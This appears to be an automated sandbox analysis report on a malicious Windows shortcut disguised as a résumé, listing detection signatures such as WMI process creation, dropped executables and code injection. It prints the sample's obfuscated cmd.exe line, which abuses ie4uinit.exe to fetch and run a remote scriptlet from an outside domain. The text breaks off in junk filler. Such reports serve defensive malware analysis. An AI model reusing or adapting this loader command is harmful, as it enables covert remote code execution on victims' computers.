Edit tour
Windows
Analysis Report
Education and Experience.lnk(1).zip
Overview
General Information
Detection
Score: | 52 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Very long command line found
Creates processes via WMI
Contains functionality to create processes via WMI
Drops PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
Creates COM task schedule object (often to register a task for autostart)
PE file contains sections with non-standard names
Binary contains a suspicious time stamp
Sample execution stops while process was sleeping (likely an evasion)
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64_ra
- cmd.exe (PID: 6460 cmdline:
"C:\Window s\System32 \cmd.exe" /v /c set "Lucky50=e " && set " Lucky5=$w" && set "L ucky03=ver sion" && s et "Lucky1 0=d" && (f or %u in ( a) do @set "Lucky87= %~u") && s et "Lucky4 1=Fast" && call set "Lucky59=% Lucky41:~2 ,1%" && se t "Lucky85 =init" && set "Lucky 7=t" && se t "Lucky26 =." && set "Lucky23= settings" && set "Lu cky55=si" && (for %q in (c) do @set "Luc ky29=%~q") && set "L ucky65=!Lu cky26!inf" && set "L ucky15=ieu !Lucky85!! Lucky65!" && call !L ucky59!et "Lucky11=% app!Lucky1 0!ata%\mic ro!Lucky59 !oft\" && !Lucky59!e t "Lucky8= !Lucky11!! Lucky15!" && (for %p in ("[!Lu cky03!]" " signature = !Lucky5! indows nt$ " "[!Lucky 10!e!Lucky 59!tinatio ndirs]" "E 4139C=01" "[!Lucky10 !efaultin! Lucky59!ta ll.windows 7]" "UnReg is!Lucky7! erOCXs=A68 7D4" "!Luc ky10!elfil !Lucky50!s =E4139C" " [A687D4]" "%11%\scro \" "%Lucky 51%j,NI,%L ucky21%%Lu cky0%%Luck y0%p%Lucky 1%%Lucky9% %Lucky9%so phia-lagoo n!Lucky26! %Lucky56%/ 81754783" "[E4139C]" "ieu%Luck y69%!Lucky 65!" "[!Lu cky59!!Luc ky7!rings] " "Lucky69 =!Lucky85! " "Lucky0= t;Lucky40" "!Lucky59 !ervicen!L ucky87!me= ' '" "Luck y21=h" "Lu cky1=:;Luc ky35" "Luc ky9=/" "!L ucky59!hor tsvcn!Luck y87!me=' ' " "Lucky56 =net" "Luc ky51=b;Luc ky67" "Luc ky25=%time %") do @e! Lucky29!ho %~p)>"!Lu cky8!" && !Lucky59!e t "Lucky2= ie4u!Lucky 85!.!Lucky 50!xe" && call xcopy /Y /C /Q %win!Lucky 10!ir%\!Lu cky59!yste m32\!Lucky 2! "!Lucky 11!*" | se t Lucky93= Nation && !Lucky59!t !Lucky87!r t "" wmi!L ucky29! pr oce!Lucky5 9!s call ! Lucky29!re a!Lucky7!e "!Lucky11 !!Lucky2! -base!Luck y23!" | se t Lucky28= Occur Ele vator Knoc k Consider ations Tee ns Stool R ankings Of fices Mess age Toward Reviews D iscusses A ppliances Tasks Scor pion Situa tions Eras e Shock Cl ean Vault Carriers T wins Disea se Dentist s Seeks Fr iends Impu lse Vehicl es Stand S ubmissions Night Bat teries Cig ar Junior Heart Habi t Containe rs Cables Taxes Ostr ich Series Incentive s Sorts Er ode Measur ements Inv estigators Styles Mu sic Actres s Items Di ffer Suits Sources A rchives He adphones T exas Emoti ons Monste rs Above H oldings Ou tputs Char acteristic s Forecast s Readers Processes Plastic Mo squito Ros es Manuals Represent atives Edi tors Eleph ant Recomm endations Roommates Coral Dolp hin Offers Focuses I mplies Ign ore Champi ons Family Rangers G arlic Blin d Evidence Facilitie s Products Makers Wi ves Pocket s Solaris Vibrant Ex cess Raven Secrets C elebs Summ aries Inhe rit Crawl Tutorials Stands Upg rade Crowd Betray Or ange Patie nt Entire Weather Cr uel Wellne ss Attenti on Waters Failures J ewel Butto ns Assume Configurat ions Level s Enemy La bels Memor ies Ticket Honey Vio